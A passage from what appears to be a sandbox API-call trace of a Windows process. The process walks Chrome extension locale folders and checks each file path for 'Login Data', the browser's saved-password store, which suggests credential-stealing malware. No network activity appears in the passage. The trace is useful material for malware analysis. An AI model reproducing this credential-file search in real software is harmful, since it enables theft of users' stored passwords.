ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.674] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.674] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.674] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.674] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.674] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.674] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned 137 [0161.674] lstrlenW (lpString="\\") returned 1 [0161.674] GetProcessHeap () returned 0x8e0000 [0161.674] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.674] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs" [0161.674] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\" [0161.674] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\") returned 138 [0161.674] lstrlenW (lpString="messages.json") returned 13 [0161.674] GetProcessHeap () returned 0x8e0000 [0161.674] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.674] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\" [0161.674] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" [0161.674] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.674] GetProcessHeap () returned 0x8e0000 [0161.674] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.674] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json", lpSrch="Login Data") returned 0x0 [0161.674] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.674] GetProcessHeap () returned 0x8e0000 [0161.674] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.674] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.674] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.674] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.674] GetProcessHeap () returned 0x8e0000 [0161.675] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.675] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.675] GetProcessHeap () returned 0x8e0000 [0161.675] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.675] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="da", cAlternateFileName="")) returned 1 [0161.675] lstrcmpiW (lpString1="da", lpString2=".") returned 1 [0161.675] lstrcmpiW (lpString1="da", lpString2="..") returned 1 [0161.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.675] lstrlenW (lpString="\\") returned 1 [0161.675] GetProcessHeap () returned 0x8e0000 [0161.675] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.675] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.675] lstrlenW (lpString="da") returned 2 [0161.675] GetProcessHeap () returned 0x8e0000 [0161.675] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.675] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da" [0161.675] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.675] GetProcessHeap () returned 0x8e0000 [0161.675] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned 137 [0161.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned 137 [0161.675] lstrlenW (lpString="\\*.*") returned 4 [0161.675] GetProcessHeap () returned 0x8e0000 [0161.675] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.675] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da" [0161.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*.*" [0161.675] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.676] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.676] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.676] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.676] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.676] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ebca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.676] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned 137 [0161.676] lstrlenW (lpString="\\") returned 1 [0161.676] GetProcessHeap () returned 0x8e0000 [0161.676] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.676] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da" [0161.676] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\" [0161.676] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\") returned 138 [0161.676] lstrlenW (lpString="messages.json") returned 13 [0161.676] GetProcessHeap () returned 0x8e0000 [0161.676] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.676] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\" [0161.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" [0161.677] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.677] GetProcessHeap () returned 0x8e0000 [0161.677] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.677] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json", lpSrch="Login Data") returned 0x0 [0161.677] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.677] GetProcessHeap () returned 0x8e0000 [0161.677] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.677] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ebca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.677] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.677] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.677] GetProcessHeap () returned 0x8e0000 [0161.677] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.677] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.677] GetProcessHeap () returned 0x8e0000 [0161.677] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.677] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864ed410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864ed410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="de", cAlternateFileName="")) returned 1 [0161.677] lstrcmpiW (lpString1="de", lpString2=".") returned 1 [0161.677] lstrcmpiW (lpString1="de", lpString2="..") returned 1 [0161.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.677] lstrlenW (lpString="\\") returned 1 [0161.677] GetProcessHeap () returned 0x8e0000 [0161.677] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.677] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.677] lstrlenW (lpString="de") returned 2 [0161.677] GetProcessHeap () returned 0x8e0000 [0161.677] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.677] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de" [0161.677] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.678] GetProcessHeap () returned 0x8e0000 [0161.678] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.678] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned 137 [0161.678] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned 137 [0161.678] lstrlenW (lpString="\\*.*") returned 4 [0161.678] GetProcessHeap () returned 0x8e0000 [0161.678] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.678] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS 